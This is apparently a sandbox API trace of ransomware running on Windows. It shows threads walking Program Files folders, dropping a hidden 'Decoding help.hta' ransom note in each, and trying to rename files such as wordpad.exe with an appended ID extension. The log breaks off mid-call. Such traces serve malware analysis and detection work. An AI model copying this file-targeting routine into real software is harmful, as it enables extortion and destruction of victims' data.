[0042.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnssci.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnssci.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.811] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssui.dll.mui", cAlternateFileName="")) returned 1 [0042.811] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.811] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssui.dll.mui") returned -1 [0042.811] lstrlenW (lpString="wmpnssui.dll.mui") returned 16 [0042.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmpnssui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui" [0042.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui" [0042.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnssui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnssui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.811] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPSideShowGadget.exe.mui", cAlternateFileName="")) returned 1 [0042.812] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.812] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.812] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPSideShowGadget.exe.mui") returned -1 [0042.812] lstrlenW (lpString="WMPSideShowGadget.exe.mui") returned 25 [0042.812] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.812] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="WMPSideShowGadget.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui" [0042.812] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui" [0042.812] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpsideshowgadget.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPSideShowGadget.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpsideshowgadget.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.812] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPSideShowGadget.exe.mui", cAlternateFileName="")) returned 0 [0042.812] FindClose (in: hFindFile=0x5d8b90 | out: hFindFile=0x5d8b90) returned 1 Thread: id = 253 os_tid = 0x93c [0040.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*", lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e10 [0040.608] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.608] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.608] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.608] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.608] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoeres.dll.mui", cAlternateFileName="")) returned 1 [0040.610] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" [0040.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned 43 [0040.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta" [0040.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\en-us\\decoding help.hta")) returned 0xffffffff [0040.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.832] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8e0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8e0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.833] CloseHandle (hObject=0x33c) returned 1 [0040.833] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.285] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msoeres.dll.mui") returned -1 [0041.285] lstrlenW (lpString="msoeres.dll.mui") returned 15 [0041.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" [0041.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned 43 [0041.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\", lpString2="msoeres.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" [0041.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" [0041.285] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files\\windows mail\\en-us\\msoeres.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\en-us\\msoeres.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.286] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 1 [0041.286] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" [0041.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned 43 [0041.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta" [0041.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\en-us\\decoding help.hta")) returned 0x1 [0041.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinMail.exe.mui") returned -1 [0041.286] lstrlenW (lpString="WinMail.exe.mui") returned 15 [0041.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" [0041.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned 43 [0041.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\", lpString2="WinMail.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" [0041.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" [0041.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files\\windows mail\\en-us\\winmail.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\en-us\\winmail.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.286] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 0 [0041.286] FindClose (in: hFindFile=0x5d7e10 | out: hFindFile=0x5d7e10) returned 1 Thread: id = 254 os_tid = 0x928 [0040.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*", lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e50 [0040.611] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.611] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.611] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.611] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0040.611] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0040.611] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0040.611] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0040.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0040.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned 47 [0040.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US" [0040.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*" [0040.613] GlobalMemoryStatus (in: lpBuffer=0x12f1fd10 | out: lpBuffer=0x12f1fd10) [0040.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11143b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0040.614] CloseHandle (hObject=0x2ec) returned 1 [0040.614] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e3a861e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9e3a861e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9e7acb45, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x45f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0040.616] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0040.616] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned 47 [0040.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta" [0040.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\accessories\\decoding help.hta")) returned 0xffffffff [0040.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\accessories\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0040.617] WriteFile (in: hFile=0x2ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x12f1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x12f1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.618] CloseHandle (hObject=0x2ec) returned 1 [0040.618] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.618] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wordpad.exe") returned -1 [0040.618] lstrlenW (lpString="wordpad.exe") returned 11 [0040.618] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0040.618] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned 47 [0040.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\", lpString2="wordpad.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe" [0040.619] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe" [0040.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe" (normalized: "c:\\program files\\windows nt\\accessories\\wordpad.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\accessories\\wordpad.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.619] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea54dff0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xea54dff0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x464289e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0040.619] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0040.619] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned 47 [0040.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta" [0040.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\accessories\\decoding help.hta")) returned 0x1 [0040.619] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WordpadFilter.dll") returned -1 [0040.619] lstrlenW (lpString="WordpadFilter.dll") returned 17 [0040.619] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0040.619] lstrlenW (lpString="\\\\?\\C:\\Program 